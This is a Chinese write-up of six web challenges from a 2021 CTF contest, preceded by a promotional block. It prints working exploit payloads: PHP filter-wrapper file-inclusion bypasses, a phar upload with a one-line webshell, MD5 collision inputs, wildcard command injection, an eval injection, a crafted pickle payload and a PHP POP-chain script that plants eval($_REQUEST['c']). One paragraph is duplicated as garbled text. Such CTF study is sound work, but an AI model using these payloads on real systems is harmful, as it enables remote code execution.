0x01 前言
背景:
2021年10月15日的“中國能源網路安全大賽”
感覺WEB的考點形形色色,其中有1道偏于黑盒測驗的簡單題目,4道是白盒審計類題目,還有一道是Python的反序列化題目,題目名稱大致如下:
因為唯一的一道黑盒題目還是檔案包含題目,所以將題目源代碼全部扒下來了,給大家提供復現環境,(flag自己創建),
為了感謝廣大讀者伙伴的支持,準備了以下福利給到大家:
[一>獲取<一]
1、200多本網路安全系列電子書(該有的都有了)
2、全套工具包(最全中文版,想用哪個用哪個)
3、100份src原始碼技術檔案(專案學習不停,實踐得真知)
4、網路安全基礎入門、Linux、web安全、攻防方面的視頻(2021最新版)
6、 網路安全學習路線(告別不入流的學習)
7、ctf奪旗賽決議(題目決議實戰操作)
[一>獲取<一]
下面分享這次比賽的解題程序,
0x02 ezphp
這是一道很簡單的題目,同時也被大家刷成了簽到題,
打開界面顯示如下:
單機按鈕后會回傳源代碼,如圖:
這里MD5的判斷已經是千年老題了,使用陣列就可以繞過,
問題是下面的 r e s 的 結 果 不 可 以 包 含 f l a g 字 符 串 , 這 里 的 話 我 們 可 以 通 過 p h p 偽 協 議 將 它 進 行 b a s e 64 加 密 繞 過 即 可 , 但 是 我 們 可 以 注 意 到 res的結果不可以包含flag字串,這里的話我們可以通過php偽協議將它進行base64加密繞過即可,但是我們可以注意到 res的結果不可以包含flag字符串,這里的話我們可以通過php偽協議將它進行base64加密繞過即可,但是我們可以注意到request_url中間是拼接了一個url地址的,如圖:
這里我們可以將php偽協議拆分成兩段,例如:
php://filter/read=convert.base64-encode/****v/popular/all****/resource=/flag,這樣雖然PHP會拋出例外,但是也是可以正常運行的,如圖:
Base64解密獲得flag:
0x03 phar
這道題有一定的黑盒成分,也是比較簡單的一道題目,首頁如下:
我們可以看到這里給出了一個hint,那么訪問include.php看一下,如圖:
給出了提示,說引數的key值為file,那么包含/etc/passwd看一下結果:
顯然這里包含失敗了,在這里我們只能對源代碼的撰寫進行猜測,這里有兩條路可選:
1: 程式寫法為 include $_GET[file] . ‘.xxx’; 針對這一種情況,我們可以fuzz后綴到底是什么,然后再進行讀原始碼或包含一系列操作,
2: 顯然這一條路是比較離譜的,也就是說,根據題目名為phar,是否考點為phar反序列化?或者這里存在一個輔助的class.php檔案,只是我們不知道class的檔案名而已,但是由于這里的hint為include.php,顯然這一條路是比較離譜的,
那么這里可以包含以下include,如圖:
顯然形成自己包含自己,后綴確定為.php,使用偽協議閱讀原始碼:
這里不讓使用base,那么我們可以使用url二次編碼繞過,將“e”字符進行二次編碼,如圖:
懟出php原始碼:
根據hint.php找到上傳點upload.php,這里讀取upload.php原始碼,如圖:
這里限制了后綴與mime型別,但是沒關系,我們可以上傳后綴為jpg的phar檔案,在phar檔案中存放一個1.php為一句話木馬,包含即可,如圖:
然后phar包含:
0x04 HardCode
這里第一個if判斷使用md5強碰撞即可,
M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
下面的preg_match過濾也是比較嚴格的,這里首先判斷版本號,筆者通過http頭發現php版本為5.2.9版本,如圖:
顯然這里的preg_match只是多了一個@符號的限制,但是我們還是可以通過Linux的通配符來匹配的,如圖:@的ASCII:
那么根據題目中的過濾0-9,我們可取的也就是@與數字9中間的特殊符號:
這里筆者取“>”,完整的正則寫為[>-[],
構造Payload:
x=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&y=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&code=
.%20/???/????????[\>-[]
如圖:
睡眠3秒,這里可以直接反彈shell,
0x05 CODE
毫無卵用的加密,然后對eval一步一步echo得出如下源代碼:
<?php
// error_reporting(E_NOTICE);
highlight_file(__FILE__);
@session_start();
$username = @$_GET['whoami'];
if(!@isset($username['admin'])||$username['admin'] != @md5($_SESSION['username'])) {
die('error!');
} else {
if(isset($_GET['code'])) {
$admin = $_GET['code'];
$admin = addslashes($admin);
if(preg_match('/\{openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|scandir|assert|pcntl_exec|fwrite|curl|system|eval|assert|flag|passthru|exec|system|chroot|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore([^}]+)\}/i' , $admin)) {
die('error!');
}
if (intval($admin)) {
eval('"' .$admin .('"./hh.php"') .')}}";');
}
} else {
eval('$flag="' .$admin . '";');
}
}
?>
這里$_SESSION[username]是null,所以我們只要使用一個空的md5串就行:whoami[admin]=d41d8cd98f00b204e9800998ecf8427e
下面$_GET[code]經過了addslashes函式,無法閉合下面eval('"' .$admin .('"./hh.php"') .')}}";');的雙引號,我們列印一下如圖:
這里肯定回拋出一個語法錯誤的,因為語法格式是錯誤的,
但是在雙引號包裹${}進行執行還有一個姿勢,如圖:
這種寫法就允許了兩對雙引號在未經反斜杠轉義下的決議,
那么構造Payload:?whoami[admin]=d41d8cd98f00b204e9800998ecf8427e&code=1${${print(
這樣成功輸出了./hh.php,在preg_match中并沒有過濾反引號,我們可以通過反引號來執行命令,如圖:
放在題目中查看flag位置,如圖:
但是在preg_match中過濾了“flag”字符,這里可以使用Linux的通配符來匹配,如圖:
0x06 EZpy
閱讀源代碼:
import base64
import io
import sys
import pickle
import b
from flask import Flask, Response, render_template, request
app = Flask(__name__)
def read(filename, encoding='utf-8'):
with open(filename, 'r', encoding=encoding) as fin:
return fin.read()
class people:
def __init__(self, name, sex, age):
self.name = name
self.sex = sex
self.age=age
def __repr__(self):
return f'people(name={self.name!r}, category={self.sex!r}, age={self.age!r})'
#==判斷
def __eq__(self, other):
return type(other) is people and self.name == other.name and self.sex == other.sex and self.age==other.age
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module[0:8] == '__main__':
return getattr(sys.modules['__main__'], name)
raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def here_load(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
@app.route('/',methods=['GET','POST'])
def index():
if request.args.get('source'):
return Response(read(__file__),mimetype='text/plain')
else:
return Response("/?source=")
@app.route('/app', methods=['GET', 'POST'])
def inll():
if request.method == 'POST':
try:
pickle_data = request.form.get('data')
if b'R' in base64.b64decode(pickle_data):
return 'no no no'
else:
result = here_load(base64.b64decode(pickle_data))
if type(result) is not people:
return '????'
correct = (result == people(b.name, b.sex, b.age))
if correct:
return Response(read('/flag.txt'))
except Exception as e:
return Response(str(e))
test = people('test', 'test','55')
pickle_data = base64.b64encode(pickle.dumps(test)).decode()
return Response(pickle_data)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000)
這里過濾了R指令碼,那么跟進here_load方法,如圖:
這里指明了只可以獲取__main__模塊下的包,那么這里命令執行暫時先不考慮,我們繼續往下看代碼:
將反序列化出來的物件與people物件進行比較,默認比較應該按照地址進行比較,但是這里的people類寫了__eq__魔術方法,這里的比較就只是生成出來的物件的屬性比較了,如圖:
那么我們就可以通過Python反序列化,去修改b包中的name,sex,age屬性,并且再生成一個people物件,經過__eq__的比較,即可獲取flag.txt的內容,撰寫POC:
import base64
data=b'c__main__\nb\n}(Vname\nVtest\nVage\nV13\nVsex\nVnan\nub0c__main__\npeople\n)\x81}(Vname\nVtest\nVage\nV13\nVsex\nVnan\nub.'
print(base64.b64encode(data))
發送Payload:
獲取flag,
0x07 ezp0p
純純的代碼審計題目:
<?php
error_reporting(0);
highlight_file(__FILE__);
class This{
protected $formatters;
public function want(){
echo "what do you want to do?";
}
public function __call($method, $attributes)
{
return $this->format($method, $attributes);
}
public function format($formatter, $arguments)
{
$this->getFormatter($formatter)->patch($arguments[0][1][0]);
}
public function getFormatter($formatter)
{
if (isset($this->formatters[$formatter])) {
return $this->formatters[$formatter];
}
}
}
class Easy{
protected $events;
protected $event;
public function __destruct()
{
$this->events->dispatch($this->event);
}
public function welcome(){
echo "welcome CTFer!";
}
}
class Ctf{
protected $ban;
protected $cmd;
public function upup(){
echo "upupupupupupup!";
}
public function __construct()
{
$this->ban='script';
$this->cmd='whoami';
}
public function dispatch($cmd){
call_user_func_array("script",$cmd);
}
}
class Gema{
protected $xbx;
public function gema(){
echo "wish you like this ezp0p!";
}
public function __construct()
{
$this->xbx='script';
}
public function patch($Fire){
call_user_func($this->xbx,$Fire);
}
}
if($_POST['x']!=$_POST['y'] && md5($_POST['x'])===md5($_POST['y'])){
if(file_get_contents(substr($_POST['x'],0,20))!=null){
@unserialize(base64_decode($_POST['data']));
}else{
die('To read this file??');
}
}else{
die('maybe you are right??');
}
?>
首先這里的unserialize函式是一個門檻,如圖:
要求file_get_contents必須讀出內容,再加上前面的md5判斷,我們這里可以使用fastcoll生成md5的前20位為./././././/index.php,然后進行MD5強碰撞即可,
下面進行挖掘POP鏈路,如圖:
源代碼傳送門:
鏈接:https://pan.baidu.com/s/1byWki_NV9yZNb34xuGEkBA 提取碼:xv3m
撰寫POC:
<?php
class Gema {
protected $xbx = 'assert';
}
// AAAAAAAAAAAAAA
class This {
protected $formatters = ['dispatch' => 'obj...'];
public function __construct($obj){
$this -> formatters['dispatch'] = $obj;
}
}
class Easy{
protected $events;
protected $event = [1 => ['eval($_REQUEST["c"])']];
public function __construct($obj)
{
$this -> events = $obj;
}
}
$obj = new Easy(new This(new Gema()));
echo base64_encode(serialize($obj));
獲取Flag:
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/325478.html
標籤:其他
上一篇:CTF(1)